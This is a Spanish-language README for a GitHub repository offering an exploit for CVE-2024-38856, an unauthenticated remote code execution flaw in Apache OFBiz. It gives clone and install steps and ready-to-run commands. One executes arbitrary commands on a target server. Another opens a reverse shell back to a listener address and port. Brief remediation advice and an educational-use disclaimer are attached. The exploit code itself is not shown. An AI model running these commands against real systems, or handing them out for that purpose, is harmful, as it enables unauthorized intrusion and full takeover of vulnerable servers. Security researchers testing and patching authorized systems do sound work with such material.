
Exploit para Apache OFBiz - CVE-2024-38856
Exploit para Apache OFBiz (CVE-2024-38856) Por: Alisson Faoli
Este repositorio contiene un exploit para la vulnerabilidad CVE-2024-38856 encontrada en Apache OFBiz. El fallo permite una RCE (Ejecución Remota de Código) sin autenticación.
Nota: Este exploit se proporciona únicamente con fines educativos y de investigación. El uso indebido puede ser ilegal y es responsabilidad exclusiva del usuario.
CVE: CVE-2024-38856
Software afectado: Apache OFBiz hasta la versión 18.12.14
Tipo de vulnerabilidad: RCE
Explotación: No se requiere autenticación
Clona el repositorio:
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
Instala las dependencias:
pip install -r requirements.txt
Ejecuta el exploit:
RCE:
python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"
SHELL:
python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444
Para remediar esta vulnerabilidad, se recomienda que los administradores de Apache OFBiz: Actualicen a la versión corregida disponible en https://ofbiz.apache.org/download.html. Apliquen reglas de firewall o WAF para bloquear intentos de explotación conocidos.
Si tienes alguna pregunta o quieres reportar una mejora al exploit, contáctame: LinkedIn: https://linkedin.com/in/alisson-faoli/
Este código se proporciona únicamente con fines educativos y para pruebas de seguridad en entornos autorizados. El autor no es responsable de ningún uso indebido.